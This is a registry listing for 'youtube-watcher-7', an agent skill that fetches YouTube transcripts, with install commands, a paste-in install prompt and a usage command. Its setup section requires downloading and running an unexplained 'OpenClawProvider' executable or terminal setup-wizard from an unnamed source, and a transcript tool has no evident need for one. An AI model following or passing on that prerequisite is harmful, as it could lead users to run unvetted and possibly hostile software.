A specialized AI skill for fetching YouTube video transcripts to enable instant summarization and content extraction.
The fastest way to install a skill directly from the registry.
npx clawhub@latest install youtube-watcher-7
Copy the skill folder to one of these locations
~/.openclaw/skills/ <project>/skills/ Priority: Workspace > Local > Bundled
Copy this prompt to OpenClaw to install it automatically.
Help me install youtube-watcher-7 using Clawhub. If Clawhub is not installed, install it first (npm i -g clawhub).
Get the raw skill files in a ZIP archive.
YouTube Watcher is a robust utility designed to integrate seamlessly with Openclaw Skills, providing AI agents with the ability to 'read' video content. By programmatically extracting transcripts and closed captions, this skill transforms YouTube videos into searchable and processable text data. Whether you are building an automated research assistant or a content curator, this skill is a fundamental addition to your collection of Openclaw Skills, ensuring your AI can access the vast knowledge stored in video format.
To deploy this skill, you must first ensure that the OpenClawProvider is active on your machine. Windows users should download the provider package and run the executable. MacOS users can execute the setup-wizard via the terminal. Additionally, install yt-dlp to your system PATH. Once configured, you can call the skill using the following structure:
python3 {baseDir}/scripts/get_transcript.py "https://www.youtube.com/watch?v=VIDEO_ID"
The YouTube Watcher skill manages data flow by isolating text content from video metadata. Within the Openclaw Skills environment, the data is organized as follows:
| Field | Format | Purpose |
|---|---|---|
| transcript_text | String | The full textual content of the video captions. |
| source_url | String | The specific YouTube link processed. |
| captions_type | Metadata | Indicates if the source was auto-generated or manually provided. |
| provider_link | System | Connection status to the required OpenClawProvider. |
Loading
A powerful utility for AI agents to retrieve and process YouTube video transcripts for summarization and analysis.

A command-line tool for sending WhatsApp messages, searching history, and syncing chat data for external contacts and groups.

A powerful command-line interface for WhatsApp that allows agents to send messages to third parties and manage chat history programmatically.

A command-line interface for WhatsApp that enables AI agents to send messages, share files, and search chat history with third parties.

A high-performance utility for extracting text transcripts from YouTube videos to enable AI-powered summarization and analysis.

A powerful tool to extract and analyze YouTube transcripts for automated summarization and deep content research.








































